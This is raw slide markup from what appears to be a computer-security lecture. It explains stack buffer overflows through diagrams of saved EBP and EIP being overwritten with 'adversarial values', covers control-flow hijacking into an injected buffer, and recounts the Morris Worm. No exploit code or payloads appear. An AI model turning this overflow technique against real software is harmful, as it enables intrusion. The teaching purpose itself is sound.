            <a:off x="3181350" y="5353049"/>
            <a:ext cx="400050" cy="628650"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 3055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852A2-2846-6F44-8746-AA7B94075882}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1740672" y="5410199"/>
            <a:ext cx="1440678" cy="5143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Pushing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>[1] onto stack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1E4A52-1BE1-5147-AD7D-25F427F94C86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7181850" y="2381249"/>
            <a:ext cx="800100" cy="6286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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>[1]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C24F217-C146-8043-977A-9C39E3CF146C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5768525" y="2008748"/>
            <a:ext cx="417202" cy="3553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001E54E-37A3-6248-821A-66B32E8DAF5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6153152" y="1524001"/>
            <a:ext cx="1931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base pointer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(EBP)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CA5D2A-34CC-3748-8B55-FE4D40267DFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3576010" y="3067050"/>
            <a:ext cx="5390" cy="4286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419EED1-3463-FD4C-A84E-73F2CF323A71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3109048" y="3546092"/>
            <a:ext cx="1481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pointer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(ESP)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B7C421-8178-4246-AB7E-A15D7203DD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656"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6267451" y="5815910"/>
            <a:ext cx="2857501" cy="394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622CB0-9612-7C4D-B8FA-177A5E2D5C6E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6953251" y="5410199"/>
            <a:ext cx="336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…. (more stuff including </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) …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A39ACDD2-663E-CE4C-8A83-69451E9B8337}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7867651" y="5753099"/>
            <a:ext cx="531765" cy="3429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2987402-1C2D-0846-8AEE-72CCB02EACE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6438901" y="2381249"/>
            <a:ext cx="735783" cy="6286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main EIP + 5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58D092-C768-B348-B71A-F8515B1FFE83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5695952" y="2381249"/>
            <a:ext cx="742949" cy="6286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main EBP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B7018B6-A3F3-864A-AD06-E1A9D90324F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3541666" y="2381249"/>
            <a:ext cx="2154285" cy="6286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greeting local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> name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B5CC00-A75D-434C-97C4-3527F8224269}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6438901" y="2381249"/>
            <a:ext cx="735783" cy="6286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Bad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>EIP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88F928-4D08-9F44-839A-7B3B5D669089}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5695952" y="2381249"/>
            <a:ext cx="742949" cy="6286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Bad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>EBP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1D2568-00CE-9249-A82E-0B3FB0A1C988}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3541666" y="2381249"/>
            <a:ext cx="2154285" cy="6286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Adversarial values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C01E5A-A949-2F4A-AD57-E6449637384E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5802720" y="3067050"/>
            <a:ext cx="5390" cy="4286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3C48570-128D-9F4E-B5F5-F5F29EEB9A21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4785955" y="3530844"/>
            <a:ext cx="1481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pointer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(ESP)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49EDFB2-8F67-0D40-939C-E75957B2A757}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7150100" y="1524000"/>
            <a:ext cx="2692400" cy="644979"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 0 w 3589866"/>
              <a:gd name="connsiteY0" fmla="*/ 565018 h 859972"/>
              <a:gd name="connsiteX1" fmla="*/ 1168400 w 3589866"/>
              <a:gd name="connsiteY1" fmla="*/ 835951 h 859972"/>
              <a:gd name="connsiteX2" fmla="*/ 1659466 w 3589866"/>
              <a:gd name="connsiteY2" fmla="*/ 23151 h 859972"/>
              <a:gd name="connsiteX3" fmla="*/ 2861733 w 3589866"/>
              <a:gd name="connsiteY3" fmla="*/ 277151 h 859972"/>
              <a:gd name="connsiteX4" fmla="*/ 3589866 w 3589866"/>
              <a:gd name="connsiteY4" fmla="*/ 852885 h 85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9866" h="859972">
                <a:moveTo>
                  <a:pt x="0" y="565018"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="445911" y="745640"/>
                  <a:pt x="891822" y="926262"/>
                  <a:pt x="1168400" y="835951"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1444978" y="745640"/>
                  <a:pt x="1377244" y="116284"/>
                  <a:pt x="1659466" y="23151"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1941688" y="-69982"/>
                  <a:pt x="2540000" y="138862"/>
                  <a:pt x="2861733" y="277151"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3183466" y="415440"/>
                  <a:pt x="3386666" y="634162"/>
                  <a:pt x="3589866" y="852885"/>
                </a:cubicBezTo>
              </a:path>
            </a:pathLst>
          </a:cu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C9A9DA-7D9D-7E46-914C-B6A803218EC3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="6547810" y="3067050"/>
            <a:ext cx="5390" cy="4286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CAB8110-D98B-FF4E-85A3-611589346437}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6361949" y="3546091"/>
            <a:ext cx="1481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pointer </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(ESP)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C898E898-D89E-D242-AE2C-6833A9E018CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7867651" y="5981699"/>
            <a:ext cx="531765" cy="3429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eip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BE40E533-10AE-C64D-8ED4-2FE6BF8DF8B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4590544" y="5010149"/>
            <a:ext cx="1105406" cy="74295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Bad </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>eip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24687B-AB76-8740-A3B7-0BA85456A2B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1363833">
            <a:off x="5670824" y="521368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8E0BBA-375A-6842-88A8-227DFCAC9D2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1695450" y="3200401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Low memory </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>addresses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1C6350-DA65-A14B-BD97-ADBD55CE6991}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9419440" y="3176144"/>
            <a:ext cx="1402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High memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="377367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animBg="1"/>
      <p:bldP spid="20" grpId="0" animBg="1"/>
      <p:bldP spid="22" grpId="0" animBg="1"/>
      <p:bldP spid="26" grpId="0" animBg="1"/>
      <p:bldP spid="51" grpId="0"/>
      <p:bldP spid="51" grpId="1"/>
      <p:bldP spid="13" grpId="0" animBg="1"/>
      <p:bldP spid="53" grpId="0"/>
      <p:bldP spid="54" grpId="0" animBg="1"/>
      <p:bldP spid="54" grpId="1" animBg="1"/>
      <p:bldP spid="55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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6FA27A2-7C2D-1042-AC02-5E0F71FD8C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Morris Worm</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5124" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD0DF570-DEF7-754C-987E-AE142DD1EF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7423150" cy="3849624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Released in 1988 by Robert Morris</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>Graduate student at Cornell, son of the NSA chief scientist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>First person convicted under the Computer Fraud and Abuse Act (3 years of probation and 400 hours of community service)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>Morris claimed it was intended to harmlessly measure the Internet, but it created new copies as fast as it could and overloaded infected hosts</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>$10-100M worth of damage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5125" name="Picture 8" descr="http://am.lcs.mit.edu/~rtm/morris2004.jpg">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1F744AD1-FF8E-0745-8843-C88E70892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452248"/>
            <a:ext cx="21717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D3A991C-7B05-7F4D-B745-941A73272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350" y="2900553"/>
            <a:ext cx="2002525" cy="266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3E5CEF-B604-C04D-8F00-E4EDCC279C63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6267450" y="582090"/>
            <a:ext cx="301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Famous CS prof at MIT,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>founder of the Y-combinator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B5099D-BFD9-5847-936D-3F4629D4C34C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7140445" y="5753643"/>
            <a:ext cx="4175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Floppy with the source code of the Morris worm, Computer History Museum</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1602722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9275" y="3989727"/>
            <a:ext cx="1065345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Overwriting EBP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>When greeting() returns, stack is corrupted because stack frame points to wrong address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2100" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0"/>
              <a:t>Overwriting EIP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0"/>
              <a:t>When greeting() returns, will jump to address pointed to by the EIP value “saved” on stack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Document 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61550228-C765-4A42-9261-998799EDCE5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="7255593" y="-119025"/>
            <a:ext cx="635200" cy="5618116"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartDocumen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7" name="Document 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4B2D5CF-4C29-F549-A847-2308FD9783F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="4872708" y="-119025"/>
            <a:ext cx="635200" cy="5618116"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartDocumen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A5EFE7-2CC1-B747-BD5B-342162A7C20B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7981950" y="2372432"/>
            <a:ext cx="800100" cy="62865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main local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>vars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1831D3-1FC3-EF46-924F-26E0B4800A6A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9010651" y="2543883"/>
            <a:ext cx="30489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26DC18-6F30-CF49-A46C-48D19B3ACDE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7181850" y="2372432"/>
            <a:ext cx="800100" cy="62865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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>[1]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194587-6E4E-7C41-A3D8-F36BE3C51E3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6438901" y="2372432"/>
            <a:ext cx="735783" cy="62865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main EIP + 5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0BA7AC-5615-F249-A1BC-77692D2C5CAA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5695952" y="2372432"/>
            <a:ext cx="742949" cy="628650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main EBP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71A7F7-8F17-154E-8E7A-7ADB7FFA7666}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3541666" y="2372432"/>
            <a:ext cx="2154285" cy="628650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greeting local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> name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F8D179-0B2B-A84C-9A67-7D0E83FBA28F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6674668" y="3058232"/>
            <a:ext cx="735783" cy="62865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Bad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>EIP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AD8B963-D566-CF46-A203-33B3BD7C3B1A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5695952" y="3058232"/>
            <a:ext cx="742949" cy="62865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Bad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>EBP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9940C5-A46B-B949-906C-3C9388C4FFC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3541666" y="2372432"/>
            <a:ext cx="2154285" cy="62865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Adversarial values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FF56A-59A1-BE44-97D5-4254A4836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Targets of Stack Smashing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CDCDD41-A4C9-BA40-9F2A-091D580EBC0B}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="4076595" y="5720535"/>
              <a:ext cx="919440" cy="40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CDCDD41-A4C9-BA40-9F2A-091D580EBC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0595" y="5684895"/>
                <a:ext cx="991080" cy="11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103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048045" y="3123933"/>
            <a:ext cx="3205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Make buffer include executable machine code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="Elbow Connector 17"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="41" idx="0"/>
            <a:endCxn id="43" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="16200000" flipV="1">
            <a:off x="4755538" y="2957836"/>
            <a:ext cx="9525" cy="2187984"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8466661"/>
            </a:avLst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48045" y="2286731"/>
            <a:ext cx="370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When greeting() returns, jumps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>to address pointed to by Bad EIP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67CD8D0C-832B-034A-ADB6-C5D4AF55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Control-Flow Hijacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Document 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82567E6C-FBED-234C-BE9F-5A8F0DB4A6E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="6298330" y="1560371"/>
            <a:ext cx="635200" cy="5618116"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartDocumen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4" name="Document 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B60E4E4E-DB48-8A4D-8167-5E12777F1FF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3915445" y="1560371"/>
            <a:ext cx="635200" cy="5618116"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartDocumen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F3582F-ED30-C04A-8481-907CE3FD986D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7024687" y="4051828"/>
            <a:ext cx="800100" cy="62865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main local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>vars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27622E-80D9-434B-A41A-7413D5AD76EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8053388" y="4223279"/>
            <a:ext cx="30489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7F4427-99CD-484D-99B1-59C018AA6839}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6224587" y="4051828"/>
            <a:ext cx="800100" cy="62865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argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>[1]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A082DB-09F1-D640-838D-116CE6F8E5F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5481638" y="4051828"/>
            <a:ext cx="735783" cy="62865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main EIP +2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63724F-D665-7C42-AADE-93B4C5369F52}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4738689" y="4051828"/>
            <a:ext cx="742949" cy="628650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main EBP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10C0B50-832C-A146-AE57-6ED2FDFA1BD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2584403" y="4051828"/>
            <a:ext cx="2154285" cy="628650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greeting local </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> name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31CCE7-E906-354D-A3F5-029CD9FEA1B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5481638" y="4051828"/>
            <a:ext cx="735783" cy="62865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Bad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>EIP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486E9D7-1506-E741-8CCB-1948096226DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4738689" y="4051828"/>
            <a:ext cx="742949" cy="62865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Bad</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>EBP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22E0DF-5ED6-1A44-B38E-AD1CB8DF2B87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2584403" y="4051828"/>
            <a:ext cx="2154285" cy="62865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Adversarial values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3E5A5A-C167-8246-BF65-FDF0EC6482AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2437491" y="2562223"/>
            <a:ext cx="2701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Have EIP point back into adversarial buffer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A5918-0396-E24F-AF1F-2FC17947B489}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1166810" y="4786321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Low memory </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>addresses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AD8CF9-E4D2-B540-AF12-651A27A5A6C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8890800" y="4762064"/>
            <a:ext cx="1402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High memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="949977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212" y="707404"/>
            <a:ext cx="1655973" cy="124198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357687" y="3514725"/>
